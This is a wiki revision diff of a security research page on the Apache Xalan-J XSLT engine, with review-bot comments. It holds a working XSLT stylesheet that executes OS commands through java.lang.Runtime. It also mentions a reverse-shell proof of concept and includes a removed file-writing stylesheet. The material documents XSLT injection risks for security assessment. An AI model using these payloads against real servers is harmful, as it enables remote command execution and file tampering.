Changes for page Engine_XalanJ
on 2012/01/12 08:39
on 2012/01/11 23:47
Summary
- Page properties (1 modified, 0 added, 0 removed)
- Attachments (0 modified, 0 added, 1 removed)
Details
- Page properties
-
- Content
-
... ... 
@@ -50,20 +50,25 @@ 50 50 51 51 == OS command execution == 52 52 53 -Once Java code execution is possible, it is trivial to execute arbitrary OS commands using the java.lang.Runtime class. The attached PoC will not read the output of the executed command (because loops are hard in XSLT) .But this is not a problem if a reverse-shell have already been started, isn't it ;-)53 +Once Java code execution is possible, it is trivial to execute arbitrary OS commands using the java.lang.Runtime class. The attached PoC will not read the output of the executed command (because loops are hard in XSLT), but this is not a problem if a reverse-shell have already been started, isn't it ;-) 54 54 55 -|=Namespace|=Extension functions|=PoC 56 -|http:~/~/xml.apache.org/xalan/java|split(), getRuntime(), exec() and toString()|[[xalanj-reverse-bash.xsl>>attach:xalanj-reverse-bash.xsl]] 57 57 58 - __Note__: as arrays are not a native type in XSLT, we create onein Java via split() before passing it as an argument to[[exec(String[] cmdarray)>>http://docs.oracle.com/javase/1.4.2/docs/api/java/lang/Runtime.html#exec(java.lang.String[])||rel="__blank"]].56 +Note : as arrays are not a native type in XSLT, we create one via split() before passing it as an argument to exec(String[] cmdarray). 59 59 60 -== File creation == 61 61 62 -The "write" extension element allows to create files on the engine side. The content written to the file must be valid UTF-8 (so plain ASCII works too). Existing files can be overwritten. 63 63 64 -|=Namespace|=Extension element|=Parameter|=PoC 65 -|http:~/~/xml.apache.org/xalan/redirect|write|file|[[xalanj-write.xsl>>attach:xalanj-write.xsl]] 60 +The following code will execute the command "touch /tmp/hello" : 66 66 67 -== JDBC connectivity == 68 - 69 -It is possible to use XSLT to connect to any database having a corresponding installed JDBC driver. 
62 +<?xml version="1.0"?> 63 +<xsl:stylesheet xmlns:xsl="http:~/~/www.w3.org/1999/XSL/Transform" 64 + xmlns:j="http:~/~/xml.apache.org/xalan/java" 65 + exclude-result-prefixes="j" 66 + version="1.0"> 67 + <xsl:template match="/"> 68 + <xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable> 69 + <xsl:variable name="a" select="j:split($c, ' = ')"/> 70 + <xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/> 71 + <xsl:variable name="p" select="j:exec($r, $a )"/> 72 + No content at the moment ... 73 + </xsl:template> 74 +</xsl:stylesheet>
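Review bot: The sentence kept at new line 53 still refers to "The attached PoC" and to a reverse shell, but this hunk deletes the table row linking xalanj-reverse-bash.xsl, and the stylesheet added at lines 62-74 runs "touch /tmp/hello" instead. The sentence should either point at the inline example or the attachment link should stay. Line 72, "No content at the moment ...", sits inside the xsl:template and reads like leftover placeholder text; as literal text in the template it would be copied into the transform output, so drop it or replace it with an intentional marker. The stylesheet is also added as plain wiki text with "http:~/~/" escapes, so wrapping it in a {{code}} block would let readers see the real namespace URIs. Finally, the removed table was the only place that named the Xalan java namespace and the four extension functions together; keeping that row helps readers who need to know which namespace to look for when reviewing stylesheets.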
- xalanj-write.xsl
-
- Author
-
... ... @@ -1,1 +1,0 @@ 1 -xwiki:XWiki.NicolasGregoire - Size
-
... ... @@ -1,1 +1,0 @@ 1 -373 bytes - Content
-
... ... @@ -1,13 +1,0 @@ 1 -<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 2 - xmlns:redir="http://xml.apache.org/xalan/redirect" 3 - extension-element-prefixes="redir" 4 - version='1.0'> 5 - 6 - <xsl:template match="/"> 7 - <redir:write file="/tmp/created_by_xalanj_write" method="text"> 8 - <xsl:text>Just a PoC</xsl:text> 9 - </redir:write> 10 - </xsl:template> 11 - 12 -</xsl:stylesheet> 13 -
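Review bot: Deleting xalanj-write.xsl in the same revision that removes the "File creation" section leaves the page with no mention that the write element in the http://xml.apache.org/xalan/redirect namespace can create or overwrite files on the engine side. If the attachment has to go, keep the descriptive paragraph and the namespace row so that someone assessing a Xalan-J deployment still learns the extension element exists. The content hunk also removes the "JDBC connectivity" heading and its sentence without a visible replacement; if those sections moved to another page, say so in the change comment and link to it.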